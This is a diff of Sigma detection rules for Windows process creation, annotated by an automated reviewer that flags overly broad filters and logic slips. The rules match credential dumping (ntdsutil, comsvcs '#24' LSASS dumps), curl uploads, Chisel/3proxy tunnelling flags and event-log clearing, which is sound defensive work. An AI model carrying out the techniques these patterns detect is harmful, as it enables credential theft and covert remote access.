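Review bot: The `description` is the generic ATT&CK remote-access-software text about TeamViewer, Go2Assist and others and never states what this rule matches; open it with a sentence such as `Detects execution of NetSupport Manager components (client configurator PCICFGUI.EXE, Remote Control product binaries) identified by their PE metadata` so an analyst knows what fired. The OR-list `selection` triggers on `Company: NetSupport Ltd` alone, so every binary from that vendor alerts at `medium`; that is reasonable where NetSupport is unapproved but should be spelled out in `falsepositives`, which currently says only `Legitimate use`.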
diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntdsutil.yml b/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml similarity index 57% rename from rules/windows/process_creation/proc_creation_win_susp_ntdsutil.yml rename to rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml index ff90db27b..312a8ba58 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_ntdsutil.yml +++ b/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml @@ -4,19 +4,19 @@ status: test description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT) author: Thomas Patzke references: - - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm + - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm date: 2019/01/16 modified: 2022/03/11 # increased level logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection: - Image|endswith: '\ntdsutil.exe' - condition: selection + selection: + Image|endswith: '\ntdsutil.exe' + condition: selection falsepositives: - - NTDS maintenance + - NTDS maintenance level: medium tags: - - attack.credential_access - - attack.t1003.003 + - attack.credential_access + - attack.t1003.003 diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml index 6fe080f91..e09469b62 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml 
@@ -11,7 +11,7 @@ references:
 - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN
 - https://twitter.com/frack113/status/1555830623633375232
 date: 2022/08/07
-modified: 2022/09/12
+modified: 2022/09/20
 logsource:
 category: process_creation
 product: windows
@@ -22,8 +22,9 @@ detection:
 - '~2\'
 filter:
 - ParentImage:
- - C:\Windows\System32\Dism.exe
- - C:\Windows\System32\cleanmgr.exe
+ - 'C:\Windows\System32\Dism.exe'
+ - 'C:\Windows\System32\cleanmgr.exe'
+ - 'C:\Program Files\GPSoftware\Directory Opus\dopus.exe'
 - ParentImage|endswith:
 - '\WebEx\WebexHost.exe'
 - '\thor\thor64.exe'
diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml
index dae3b3927..67657f150 100644
--- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml
+++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml
@@ -11,7 +11,7 @@ references:
 - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN
 - https://twitter.com/frack113/status/1555830623633375232
 date: 2022/08/07
-modified: 2022/08/22
+modified: 2022/09/18
 logsource:
 category: process_creation
 product: windows
@@ -20,7 +20,7 @@ detection:
 Image|contains:
 - '~1\'
 - '~2\'
- filter:
+ filter1:
 - ParentImage:
 - C:\Windows\System32\Dism.exe
 - C:\Windows\System32\cleanmgr.exe # Spawns DismHost.exe with a shortened username (if too long)
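Review bot: The new `ParentImage: 'C:\Program Files\GPSoftware\Directory Opus\dopus.exe'` entry exempts every process a user starts from that file manager, not only the helper that produced the false positive, so a short-name path in any child of Directory Opus is no longer reported; if a specific child was observed, adding an `Image` key to the same filter map keeps the exemption narrow. A one-line comment recording what Directory Opus launches with 8.3 paths, in the style of the `cleanmgr.exe # Spawns DismHost.exe ...` remark in the sibling rule, would help the next person tuning this list. The `detection` block this filter belongs to continues outside the hunk.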
@@ -30,7 +30,14 @@ detection:
 - Product: 'InstallShield (R)'
 - Description: 'InstallShield (R) Setup Engine'
 - Company: 'InstallShield Software Corporation'
- condition: selection and not filter
+ filter_installers:
+ - Image|contains|all:
+ - '\AppData\'
+ - '\Temp\'
+ - Image|endswith:
+ - '~1\unzip.exe'
+ - '~1\7zG.exe'
+ condition: selection and not 1 of filter*
 falsepositives:
 - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process.
 level: high
diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml
index 4158116e8..3f75f2dfd 100644
--- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml
+++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml
@@ -11,7 +11,7 @@ references:
 - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN
 - https://twitter.com/jonasLyk/status/1555914501802921984
 date: 2022/08/05
-modified: 2022/08/12
+modified: 2022/09/21
 logsource:
 category: process_creation
 product: windows
@@ -37,9 +37,10 @@ detection:
 - '~2.js'
 - '~2.hta'
 filter:
- ParentImage|endswith:
+ - ParentImage|endswith:
 - '\WebEx\WebexHost.exe'
 - '\thor\thor64.exe'
+ - CommandLine|contains: 'C:\xampp\vcredist\VCREDI~1.EXE'
 condition: selection and not filter
 falsepositives:
 - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process.
diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml
index fceefa59e..4c53992f1 100644
--- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml
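Review bot: The first branch of `filter_installers`, `Image|contains|all: ['\AppData\', '\Temp\']`, removes every image whose path contains both substrings, i.e. the whole `%LOCALAPPDATA%\Temp` tree, which is exactly the staging location the rule's own `falsepositives` text asks analysts to investigate; after this change a short-name image there is never reported, whatever it is. If the false positive was unpacked installers, bind the branch to what was seen, as the second branch already does with `Image|endswith` on `'~1\unzip.exe'` and `'~1\7zG.exe'`, or add a `ParentImage` key to the same map. A comment naming the installer that produced the hits would let a later reviewer judge whether the exemption is still justified.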
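Review bot: In proc_creation_win_ntfs_short_name_use_cli.yml the new `- CommandLine|contains: 'C:\xampp\vcredist\VCREDI~1.EXE'` filter entry is keyed only on a command-line substring, so it exempts any process whose arguments contain that string regardless of image or parent, whereas the two `ParentImage|endswith` entries beside it are bound to a binary; anchoring it with an `Image` or `ParentImage` key in the same map keeps the exemption tied to the XAMPP installer. The next hunk (proc_creation_win_ntfs_short_name_use_image.yml) has the same shape with `ParentImage|endswith: '-installer.exe'` and `Image|contains: '\vcredi'`, which exempt on a naming convention rather than a known path; the inline example there suggests the stricter `ParentImage|endswith: '\xampp-windows-x64-8.1.6-0-VS16-installer.exe'`, or a comment saying the broad suffix is deliberate.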
+++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml
@@ -11,7 +11,7 @@ references:
 - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN
 - https://twitter.com/jonasLyk/status/1555914501802921984
 date: 2022/08/06
-modified: 2022/08/12
+modified: 2022/09/18
 logsource:
 category: process_creation
 product: windows
@@ -37,9 +37,11 @@ detection:
 - '~2.js'
 - '~2.hta'
 filter:
- ParentImage|endswith:
+ - ParentImage|endswith:
 - '\WebEx\WebexHost.exe'
 - '\thor\thor64.exe'
+ - '-installer.exe' # e.g. C:\Users\neo\Downloads\xampp-windows-x64-8.1.6-0-VS16-installer.exe
+ - Image|contains: '\vcredi'
 condition: selection and not filter
 falsepositives:
 - Unknown
diff --git a/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml b/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml
index 4143a47ad..e2f69aae4 100644
--- a/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml
+++ b/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml
@@ -14,7 +14,7 @@ references:
 - https://twitter.com/Wietze/status/1542107456507203586
 author: Florian Roth, Modexp, Nasreddine Bencherchali (update)
 date: 2020/02/18
-modified: 2022/08/04
+modified: 2022/09/21
 tags:
 - attack.defense_evasion
 - attack.credential_access
@@ -33,7 +33,7 @@ detection:
 CommandLine|contains|all:
 - 'comsvcs'
 - 'full'
- Commandline|contains:
+ CommandLine|contains:
 - '24 '
 - '#24'
 - '#+24'
diff --git a/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml b/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml
index ef9ededa7..ad770a245 100644
--- a/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml
+++ b/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml
@@ -12,13 +12,15 @@ logsource:
 product: windows
 detection:
 selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - 'reg'
 - ' ADD '
 - 'Software\Microsoft\Windows\CurrentVersion\Run'
 condition: selection
 falsepositives:
- - Unknown
+ - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.
+ - Legitimate administrator sets up autorun keys for legitimate reasons.
+ - Discord
 level: medium
 tags:
 - attack.persistence
diff --git a/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml b/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml
index aa0568d75..1182bd8b4 100644
--- a/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml
+++ b/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml
@@ -9,6 +9,7 @@ author: frack113, Nasreddine Bencherchali
 references:
 - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import
 date: 2022/08/01
+modified: 2022/09/13
 logsource:
 category: process_creation
 product: windows
@@ -20,6 +21,7 @@ detection:
 CommandLine|contains:
 - 'C:\Users\'
 - '%temp%'
+ - '%tmp%'
 - '%appdata%'
 - '\AppData\Local\Temp\'
 - 'C:\Windows\Temp\'
diff --git a/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml b/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml
index a28f7d2c3..adce54a59 100644
--- a/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml
+++ b/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml
@@ -1,5 +1,8 @@
 title: SharpChisel Usage
 id: cf93e05e-d798-4d9e-b522-b0248dc61eaf
+related:
+ - id: 8b0e12da-d3c3-49db-bb4f-256703f380e5
+ type: similar
 status: experimental
 description: Detects usage of the Sharp Chisel via the commandline arguments
 author: Nasreddine Bencherchali
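Review bot: In the `@@ -20,6 +21,7 @@` hunk of proc_creation_win_reg_import_from_suspicious_paths.yml the path list now carries `'%temp%'`, `'%tmp%'` and the literal `'\AppData\Local\Temp\'`, but not the `%localappdata%` spelling of the same directory, so a command line that reaches the temp folder through `%localappdata%\Temp\` falls outside the list while the other three forms are caught; if the intent is to cover that directory under every name, add `- '%localappdata%'` beside `'%appdata%'`. The same `%tmp%` addition is made to proc_creation_win_susp_curl_download.yml, proc_creation_win_susp_invoke_webrequest_download.yml, proc_creation_win_susp_mofcomp_execution.yml and proc_creation_win_susp_recon.yml later in this diff, and the same consideration applies there.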
@@ -7,26 +10,30 @@ references:
 - https://github.com/shantanu561993/SharpChisel
 - https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/
 date: 2022/09/05
+modified: 2022/09/13
+tags:
+ - attack.command_and_control
+ - attack.t1090.001
 logsource:
 category: process_creation
 product: windows
 detection:
- selection_img:
+ selection_1_img:
 Image|endswith: '\SharpChisel.exe'
- selection_client_server:
- CommandLine|contains:
- - 'exe client '
- - 'exe server '
- selection_flags:
- CommandLine|contains:
- - ' --socks5'
- - ' --reverse'
- - ' r:'
- - ':127.0.0.1:'
- condition: 1 of selection_*
+ selection_1_pe:
+ Product: 'SharpChisel'
+ # Covered by Chisel Rule
+ # selection_2_client_server:
+ # CommandLine|contains:
+ # - 'exe client '
+ # - 'exe server '
+ # selection_2_flags:
+ # CommandLine|contains:
+ # - ' --socks5'
+ # - ' --reverse'
+ # - ' r:'
+ # - ':127.0.0.1:'
+ condition: 1 of selection*
 falsepositives:
- - Some flalse positives may occure with other tools with similar commandlines
-level: medium
-tags:
- - attack.command_and_control
- - attack.t1090.001
+ - Some false positives may occure with other tools with similar commandlines
+level: high
diff --git a/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml b/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml
new file mode 100644
index 000000000..3a35b6a6c
--- /dev/null
+++ b/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml
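Review bot: The rewritten `falsepositives` line still misspells `occure`; since the hunk already rewrites that line to fix `flalse`, fix both at once: `- Some false positives may occur with other tools with similar commandlines`. The commented-out `selection_2_*` blocks under `# Covered by Chisel Rule` leave dead configuration in the rule; pointing to the rule they moved to, presumably the `related` id `8b0e12da-d3c3-49db-bb4f-256703f380e5` added in the previous hunk, e.g. `# Command-line patterns live in the generic Chisel rule (8b0e12da-d3c3-49db-bb4f-256703f380e5)`, would let the twelve commented lines be dropped. With only one group left, the `selection_1_` prefix hints at a second group that no longer exists; `selection_img` / `selection_pe` with `1 of selection*` reads more naturally.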
@@ -0,0 +1,26 @@
+title: 3Proxy Usage
+id: f38a82d2-fba3-4781-b549-525efbec8506
+status: experimental
+description: Detects the use of 3proxy, a tiny free proxy server
+author: Florian Roth
+date: 2022/09/13
+references:
+ - https://github.com/3proxy/3proxy
+ - https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
+tags:
+ - attack.command_and_control
+ - attack.t1572
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ Image|endswith: '\3proxy.exe'
+ selection_pe:
+ Description: '3proxy - tiny proxy server'
+ selection_params: # param combos seen in the wild
+ CommandLine|contains: '.exe -i127.0.0.1 -p'
+ condition: 1 of selection
+falsepositives:
+ - Administrative activity
+level: high
diff --git a/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml b/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml
index fabb0e86f..3e7830ad4 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml
@@ -7,7 +7,7 @@ references:
 - https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/
 - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp
 date: 2022/02/21
-modified: 2022/04/21
+modified: 2022/09/21
 logsource:
 category: process_creation
 product: windows
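Review bot: `condition: 1 of selection` has no wildcard, so as written the pattern appears to name only the identifier `selection`, and `selection_pe` and `selection_params` are never evaluated; the other rules in this diff use the wildcard form, and that is what is needed here: `condition: 1 of selection*`. Because the image-name branch still matches, the defect is silent — a rule test with a PE-metadata-only or parameter-only event would expose it. The `# param combos seen in the wild` comment would be more useful if it cited where they were seen, e.g. the Talos reference already listed.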
@@ -22,12 +22,15 @@ detection:
 - 'chcp'
 - 'chcp '
 - 'chcp '
- condition: selection
+ filter_anaconda:
+ # This filter will only work with aurora agent enriched data as Sysmon EID 1 and EID 4688 from event log both do not contain GrandparentCommandLine field
+ GrandparentCommandLine|contains: '/c C:\ProgramData\Anaconda3'
+ condition: selection and not 1 of filter_*
 fields:
 - CommandLine
 - ParentCommandLine
 falsepositives:
- - Unknown
+ - During Anaconda update the 'conda.exe' process will eventually launch the command described in the detection section
 level: high
 tags:
 - attack.discovery
diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml
index 7815daee9..67f7c265e 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml
@@ -9,7 +9,7 @@ references:
 - https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt
 - https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/
 date: 2020/07/03
-modified: 2022/07/28
+modified: 2022/09/20
 logsource:
 category: process_creation
 product: windows
@@ -24,6 +24,7 @@ detection:
 - '\Temp\'
 - '%AppData%'
 - '%Temp%'
+ - '%tmp%'
 - '%Public%'
 - '\Desktop\'
 selection_susp_extensions:
@@ -40,7 +41,16 @@ detection:
 - ' -O' # covers the alias for --remote-name and --output
 - '--remote-name'
 - '--output'
- condition: selection_curl and 1 of selection_susp*
+ filter_git_windows:
+ ParentImage: 'C:\Program Files\Git\usr\bin\sh.exe'
+ ParentCommandLine|contains|all:
+ - 'git-update-git-for-windows'
+ - '--quiet --gui'
+ Image: 'C:\Program Files\Git\mingw64\bin\curl.exe'
+ CommandLine|contains|all:
+ - '--sil
ent --show-error --output '
+ - 'gfw-httpget-'
+ condition: selection_curl and 1 of selection_susp* and not 1 of filter_*
 fields:
 - CommandLine
 - ParentCommandLine
diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml
index 20ffcba7a..f8ae829c9 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml
@@ -9,7 +9,7 @@ references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file
 - https://curl.se/docs/manpage.html
 date: 2020/07/03
-modified: 2022/01/22
+modified: 2022/09/15
 logsource:
 category: process_creation
 product: windows
@@ -20,11 +20,12 @@ detection:
 selection_cli:
 CommandLine|contains:
 - ' -F '
- - ' --form '
+ - ' --form' # Also covers the "--form-string"
 - ' -T '
 - ' --upload-file '
 - ' -d '
 - ' --data '
+ - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode"
 condition: all of selection*
 fields:
 - CommandLine
diff --git a/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml b/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml
index 421e0f538..fa812d78b 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml
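Review bot: In proc_creation_win_susp_curl_fileupload.yml the extended `selection_cli` list still omits curl's `--json` switch, which is documented in the referenced manpage as shorthand for `--data` with JSON headers and therefore also sends a request body; if the list is meant to cover the upload flags, add `- ' --json '` next to `' --data-'`. The new `' --form'` entry without a trailing space is what makes it cover `--form-string`, and the inline comment could say that explicitly, in the same form as the `' --data-'` comment. The other `selection*` block required by `all of selection*` lies outside the hunk. The `filter_git_windows` map in the preceding curl_download hunk, by contrast, pins parent, image and both command lines and is the shape the other filters in this diff should follow.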
+++ b/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml
@@ -29,6 +29,7 @@ fields:
 falsepositives:
 - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.
 - Legitimate administrator sets up autorun keys for legitimate reasons.
+ - Discord
 level: medium
 tags:
 - attack.persistence
diff --git a/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml b/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml
index 780851390..e6c83822a 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml
@@ -4,22 +4,21 @@ status: test
 description: Detects the use of Ditsnap tool. Seems to be a tool for ransomware groups.
 author: 'Furkan Caliskan (@caliskanfurkan_)'
 references:
- - https://thedfirreport.com/2020/06/21/snatch-ransomware/
- - https://github.com/yosqueoy/ditsnap
+ - https://thedfirreport.com/2020/06/21/snatch-ransomware/
+ - https://github.com/yosqueoy/ditsnap
 date: 2020/07/04
 modified: 2021/11/27
 logsource:
- category: process_creation
- product: windows
+ category: process_creation
+ product: windows
 detection:
- selection:
- Image|endswith: '\ditsnap.exe'
- selection2:
- CommandLine|contains: 'ditsnap.exe'
- condition: selection or selection2
+ selection:
+ - Image|endswith: '\ditsnap.exe'
+ - CommandLine|contains: 'ditsnap.exe'
+ condition: selection
 falsepositives:
- - Legitimate admin usage
+ - Legitimate admin usage
 level: high
 tags:
- - attack.credential_access
- - attack.t1003.003
+ - attack.credential_access
+ - attack.t1003.003
diff --git a/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml b/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml
index da3d019ac..322528935 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml
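Review bot: The ditsnap hunk folds `selection` and `selection2` into one list-valued `selection` and changes `condition: selection or selection2` to `condition: selection`, which is a detection-logic rewrite, yet `modified: 2021/11/27` is left untouched while every other restructured rule in this diff bumps its `modified` date; set `modified:` to the date of this change so the rule history stays accurate. The merge is behaviour-preserving, since a list of maps under one identifier is OR-ed in Sigma, but readers used to the two-selection form would be helped by a short remark such as `selection: # list of maps = OR`.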
+++ b/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml
@@ -7,7 +7,7 @@ references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md
 - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html
 date: 2019/09/26
-modified: 2022/07/14
+modified: 2022/09/12
 logsource:
 category: process_creation
 product: windows
@@ -15,18 +15,19 @@ detection:
 selection_wevtutil:
 Image|endswith: '\wevtutil.exe'
 CommandLine|contains:
- - 'clear-log' # clears specified log
- - ' cl ' # short version of 'clear-log'
- - 'set-log' # modifies config of specified log. could be uset to set it to a tiny size
- - ' sl ' # short version of 'set-log'
+ - 'clear-log ' # clears specified log
+ - ' cl ' # short version of 'clear-log'
+ - 'set-log ' # modifies config of specified log. could be uset to set it to a tiny size
+ - ' sl ' # short version of 'set-log'
 selection_other_ps:
 Image|endswith:
 - '\powershell.exe'
 - '\pwsh.exe'
 CommandLine|contains:
- - 'Clear-EventLog'
- - 'Remove-EventLog'
- - 'Limit-EventLog'
+ - 'Clear-EventLog '
+ - 'Remove-EventLog '
+ - 'Limit-EventLog '
+ - 'Clear-WinEvent '
 selection_other_wmic:
 Image|endswith: '\wmic.exe'
 CommandLine|contains: ' ClearEventLog '
diff --git a/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml b/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml
index 880093006..64bd7a5e7 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml
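Review bot: `'Clear-WinEvent '` is added next to the in-box `Clear-EventLog`, `Remove-EventLog` and `Limit-EventLog` cmdlets, but I cannot find a built-in cmdlet of that name (the in-box `*-WinEvent` cmdlet is `Get-WinEvent`); if it comes from a community module, a comment naming the module would justify the entry, otherwise it is dead weight in the list. The trailing space appended to `'clear-log '`, `'set-log '` and the three PowerShell verbs narrows each match to the verb followed by a space, so a command line where the verb is the last token is no longer caught, and the hunk gives no reason for the change; whatever the motivation (probably avoiding longer names that embed these verbs), record it, e.g. `# trailing space: match the verb as a whole word — TODO confirm intent`, so the next editor does not "fix" it back.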
@@ -2,21 +2,26 @@ title: Explorer Process Tree Break
 id: 949f1ffb-6e85-4f00-ae1e-c3c5b190d605
 status: test
 description: Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost"
-author: Florian Roth, Nasreddine Bencherchali
+author: 'Florian Roth, Nasreddine Bencherchali, @gott_cyber'
 references:
 - https://twitter.com/CyberRaiju/status/1273597319322058752
 - https://twitter.com/bohops/status/1276357235954909188?s=12
 - https://twitter.com/nas_bench/status/1535322450858233858
 - https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/
 date: 2019/06/29
-modified: 2022/06/14
+modified: 2022/09/20
 logsource:
 category: process_creation
 product: windows
 detection:
 selection:
 # See CLSID_SeparateMultipleProcessExplorerHost in the registry for reference
- CommandLine|contains: '/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}'
+ - CommandLine|contains: '/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}' # This will catch, the new explorer spawning which indicates a process/tree break. But you won't be able to catch the executing process. For that you need historical data
+ # There is exists almost infinite possibilities to spawn from explorer. The "/root" flag is just an example
+ # It's better to have the ability to look at the process tree and look for explorer processes with "weird" flags to be able to catch this technique.
+ - CommandLine|contains|all:
+ - 'explorer.exe'
+ - ' /root,'
 condition: selection
 falsepositives:
 - Unknown how many legitimate software products use that method
diff --git a/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml
index a0305eede..ac7d75772 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml
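Review bot: The three comments added to `selection` are very long single lines with grammar slips (`# There is exists almost infinite possibilities`, `# This will catch, the new explorer spawning`) and they sit between two list entries, which YAML tolerates but which makes the second entry hard to find; moving them to a short block above `selection:` and tightening them — `# The /factory CLSID catches the new explorer host that indicates a tree break, not the process that requested it; historical process-tree data is needed for that.` and `# Explorer accepts many switches; /root is only one example of a spawn path.` — keeps the detection list readable. The new `'explorer.exe'` + `' /root,'` branch also matches the documented Explorer switch that shortcuts and administrators use to open a folder rooted at a path, so `falsepositives` should name that case rather than stop at `Unknown how many legitimate software products use that method`.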
+++ b/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml
@@ -6,6 +6,7 @@ author: Nasreddine Bencherchali
 references:
 - https://twitter.com/nas_bench/status/1535322445439180803
 date: 2022/06/10
+modified: 2022/09/18
 logsource:
 category: process_creation
 product: windows
@@ -16,9 +17,13 @@ detection:
 filter:
 Image|endswith: '\explorer.exe'
 CommandLine|contains: '\Notepad++\notepad++.exe'
- condition: selection and not filter
+ filter_parent:
+ ParentImage|contains: '\Notepad++\updater\'
+ filter_null:
+ CommandLine: null
+ condition: selection and not 1 of filter*
 falsepositives:
 - Other parent binaries using GUP not currently identified
-level: high
+level: medium
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml b/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml
index 05d19eed8..f01b13a1f 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)
 author: Max Altgelt
 date: 2021/12/09
-modified: 2022/03/08
+modified: 2022/09/20
 references:
 - https://pentestlaboratories.com/2021/12/08/process-ghosting/
 tags:
@@ -25,9 +25,11 @@ detection:
 - Image:
 - 'Registry'
 - 'MemCompression'
+ - 'vmmem'
 - CommandLine:
 - 'Registry'
 - 'MemCompression'
+ - 'vmmem'
 condition: not image_absolute_path and not 1 of filter*
 falsepositives:
 - Unknown
diff --git a/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml b/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml
index be17123fc..cddb6c356 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml
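Review bot: `filter_null: CommandLine: null` exempts every event that carries no command line, so on telemetry that does not record one (4688 without command-line auditing, or some EDR exports) the whole rule goes quiet instead of falling back to the image/parent match; a comment stating why empty command lines are excluded, e.g. `# GUP started without arguments — presumably the updater's own check — TODO confirm`, would let a tuner decide whether that trade-off holds for their sources. `ParentImage|contains: '\Notepad++\updater\'` matches the substring anywhere in the path, including user-writable locations; anchoring on the install root, e.g. `ParentImage|startswith: 'C:\Program Files\Notepad++\updater\'` (constructed example path), is tighter. The drop from `level: high` to `level: medium` is not explained anywhere in the hunk.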
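Review bot: In the proc_creation_win_susp_image_missing.yml hunk, `'vmmem'` is added to both filter lists without a comment, while the existing `Registry` and `MemCompression` entries are at least recognisable kernel pseudo-processes; a remark on the first entry, `- 'vmmem' # Hyper-V / WSL2 virtual-machine memory pseudo-process`, records why it is exempt. The same addition in proc_creation_win_susp_non_exe_image.yml further down takes the same comment.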
+++ b/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml
@@ -9,6 +9,7 @@ author: Nasreddine Bencherchali
 references:
 - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/
 date: 2022/08/02
+modified: 2022/09/13
 logsource:
 category: process_creation
 product: windows
@@ -34,6 +35,7 @@ detection:
 - '\Temp\'
 - '%AppData%'
 - '%Temp%'
+ - '%tmp%'
 - '%Public%'
 - '\Desktop\'
 - 'C:\Windows\'
diff --git a/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml
index 07b7eb8f6..8d625c51f 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml
